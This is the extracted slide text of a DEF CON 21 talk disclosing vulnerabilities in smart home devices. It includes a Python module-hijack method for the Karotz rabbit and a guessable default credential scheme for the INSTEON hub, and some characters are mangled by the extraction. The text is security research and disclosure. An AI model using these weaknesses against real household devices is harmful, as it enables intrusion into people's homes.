home invasion 2.0 - def con 21 - 2013
DESCRIPTION
A talk discussing vulnerabilities in various "smart home" technologies from home automation gear to a child's toy.TRANSCRIPT
© 2012
Home Invasion v2.0
© 2012
WHO ARE WE?
© 2012
Daniel “unicornFurnace” Crowley • Managing Consultant, Trustwave SpiderLabs Jennifer “savagejen” Savage • SoAware Engineer, Tabbedout David “videoman” Bryan • Security Consultant, Trustwave SpiderLabs
The Presenters
© 2012
WHAT ARE WE DOING HERE?
© 2012
Science ficFon becomes science fact Race to release novel products means poor security AIempt to hack a sampling of “smart” devices Many products we didn’t cover
Android powered oven Smart TVs (another talk is covering one!) IP security cameras
The “Smart” Home
WHAT’S OUT THERE NOW?
Locks, thermostats, fridges, toilets, lights, toys
EnFre smart ciFes like Songdo
WHAT’S IN THE FUTURE?
Karotz Smart Rabbit
• Exposure of wifi network credenFals unencrypted • Unencrypted remote API calls • Unencrypted setup package download • Python module hijack in autorunwifi script
Karotz Smart Rabbit
Karotz Smart Rabbit
Karotz Smart Rabbit
Karotz Smart Rabbit Python Module Hijacking
• Python Module Hijacking is insecure library loading o Similar to LD_PRELOAD and DLL hijacking
• Python loads modules from the dir of script first • Karotz autorunwifi script uses simplejson module
o Put code to execute in simplejson.py in the same directory as autorunwifi
• Defeats code signing
Karotz Smart Rabbit An aIacker could: • MITM insecure connecFon to Karotz server • Replace user's download with malicious version • Use vuln to make Karotz run their own code! • ...Bunny bot net?
© 2012
Belkin WeMo Switch
© 2012
• Vulnerable libupnp version o Remote pre-‐auth root
• UnauthenFcated UPnP acFons o SetBinaryState o SetFriendlyName
• EULA used to “secure” the device. • Belkin has been awesome!
Belkin WeMo Switch
SONOS Bridge
• Support console informaFon disclosure
SONOS Bridge
SONOS Bridge
SONOS Bridge
SONOS Bridge
SONOS Bridge
SONOS Bridge
© 2012
LIXIL SaSs Smart Toilet
© 2012
• Default Bluetooth PIN LIXIL SaSs Smart Toilet
© 2012
INSTEON Hub
© 2012
INSTEON Hub
© 2012
• Lack of authenFcaFon on web console o Web console exposed to the Internet
§ Time zone – city § Name street
o Control all the things.
• Fixed the authenFcaFon with model 2422-‐222”R”
INSTEON Hub
© 2012
• SFll lack of SSL/TLS • Uses HTTP Auth
o Base64 encoded credenFals o Username: admin o Password: ABCDEF ← INSTEON ID and last 3 of
the MAC o #SecurityFail o It only takes 16 Million aIempts
INSTEON Hub
© 2012
MiCasaVerde VeraLite
© 2012
• Lack of authenFcaFon on web console by default • Insufficient AuthorizaFon Checks
o Firmware Update o Sekngs backup o Test Lua code
• Path Traversal • Cross-‐Site Request Forgery • Lack of authenFcaFon on UPnP daemon • Vulnerable libupnp Version • Server Side Request Forgery • Unconfirmed AuthenFcaFon Bypass
MiCasaVerde VeraLite
© 2012
• Three methods of auth bypass • Seven methods to get root • Two aIacks remotely exploitable through SE • PotenFal for ownage of ALL the VeraLites!
MiCasaVerde VeraLite
© 2012
DEMONSTRATION
© 2012
CONCLUSION
© 2012
Daniel “unicornFurnace” Crowley [email protected] @dan_crowley
Jennifer “savagejen” Savage [email protected] (PGP key ID 6326A948) @savagejen
David “videoman” Bryan [email protected] @_videoman_
QuesSons?